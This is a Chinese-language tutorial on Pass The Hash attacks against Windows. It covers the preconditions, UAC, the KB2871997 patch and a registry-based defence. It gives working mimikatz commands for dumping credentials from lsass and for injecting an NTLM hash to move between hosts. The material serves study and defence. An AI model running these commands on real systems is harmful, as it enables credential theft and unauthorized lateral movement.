目录

PTH(Pass The Hash) 攻击分析

PTH(Pass The Hash) 攻击

概述

获取一台主机的本地管理员组成员账号的口令 NTLM 后,不需破解获取口令明文,使用 PTH 方式,将管理员账号及 NTLM 注入当前会话作为凭据,利用该凭证可以渗透获取周围主机的管理权限

对方主机需存在相同的账号,且是管理员组成员

Windows NT 5.x 系统中,管理员组账号的网络登录均能获取系统管理权

Windows NT 6.x 系统及更高的版本中,管理员组(SID500)账号的网络登录不能获取系统管理权限,administrator(SID为500)账号的网络登录能获取系统管理权

这类攻击适用于:

  • 域/工作组环境

  • 可以获得 hash,但是条件不允许对 hash 爆破

  • 内网中存在和当前机器相同的密码

UAC

用户帐户控制 (User Account Control) 是 Windows Vista(及更高版本操作系统)中一组新的基础结构技术,可以帮助阻止恶意程序(有时也称为"恶意软件")损坏系统,同时也可以帮助组织部署更易于管理的平台。 使用 UAC,应用程序和任务总是在非管理员帐户的安全上下文中运行,但管理员专门给系统授予管理员级别的访问权限时除外。UAC 会阻止未经授权应用程序的自动安装,防止无意中对系统设置进行更改。

用户帐户控制(UAC)是新版 Windows 的核心安全功能,也是其最常被人误解的众多安全功能当中的一种。

攻击

mimikatzpth 功能需要本地管理员权限,这是由它的实现机制决定的,需要先获得高权限进程 lsass.exe 的信息

对于 8.1/2012r2,安装补丁KB2871997Win 7/2008r2/8/2012,可以使用 AES keys 代替 NT hash

使用 mimikatz 先获取 hash:

1
2
privilege::debug
sekurlsa::logonpasswords

得到 hash 后

工作组

1
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7

微软也对 pth 打过补丁,然而在测试中发现,在打了补丁后,常规的 Pass The Hash 已经无法成功,唯独默认的 Administrator (SID 500) 账号例外,利用这个账号仍可以进行 Pass The Hash 远程 ipc 连接。

域内用户

前提是:域用户为本地管理组成员

1
sekurlsa::pth /user:eviluser /domain:adsec.com /ntlm:ccef208c6485269c20db2cad21734fe7

域内用户不受补丁影响。

KB2871997

Changes to this feature include: prevent network logon and remote interactive logon to domain-join ed machine using local accounts…

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143726.png-water_print

安装 KB2871997 补丁后,其他方面并没有太多的变化 。补丁会给本地账号添加一个 S-1-5-113SID,为管理组中的本地账号添加一个 S-1-5-114SID,这样方便通过域策略进行管理,例如从域策略中全面禁止这类账号的网络登录。

防御

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Policies\System\FilterAdministratorToken,系统中一个有 Admin ApprovalModeUAC 就是通过上面的注册表键值来判断,默认设置为 0。如果设置为 1,则 SID500 的管理员也不能通过网络登录的方式获取高权限。

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143747.png-water_print